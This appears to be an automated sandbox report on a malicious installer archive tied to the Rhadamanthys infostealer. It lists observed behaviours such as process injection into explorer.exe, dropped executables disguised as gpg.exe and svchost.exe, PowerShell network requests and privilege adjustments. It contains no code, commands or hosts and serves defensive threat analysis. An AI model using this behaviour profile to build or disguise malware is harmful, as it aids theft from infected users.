Analysis Overview
SHA256
718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6
Threat Level: Known bad
The file x32_x64_installer.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Suspicious use of FindShellTrayWindow
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies registry class
Checks processor information in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-26 12:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-26 12:12
Reported
2024-03-26 12:22
Platform
win10v2004-20240226-en
Max time kernel
570s
Max time network
566s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3400 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 4912 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 3456 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 2496 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4644 set thread context of 3400 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 4016 set thread context of 4912 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 3700 set thread context of 2496 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 916 set thread context of 3456 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 860 set thread context of 1700 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\page_embed_script.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\gl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\kk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lt\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\128.png | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ta\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bg\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\eventpage_bin_prod.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\de\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\nl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\el\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sv\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\msedge_url_fetcher_1472_264658919\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\am\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bn\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\no\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\es_419\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\id\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\uk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ro\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\mr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ur\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\dasherSettingSchema.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\et\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\th\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fr_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ja\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lo\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ko\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_BR\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_US\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sw\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ms\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_TW\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ka\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_HK\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cs\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\eu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\is\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ca\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_PT\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\af\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_GB\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ml\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ar\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ne\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\tr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\km\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fil\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_CN\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Installer\e59d319.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE883.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE99D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2E4B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEA59.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEDF5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID622.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIECDB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{654024B2-0767-4BCD-BC79-7CF46AF9D5A1} | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{6E140374-1889-48B5-BB86-B4871CA0CE5E} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{756DD9AC-0A57-4FD0-9B91-097FCFC96327} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{38A4DE08-9A7B-4EFD-8A8C-0382089BF6F6} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
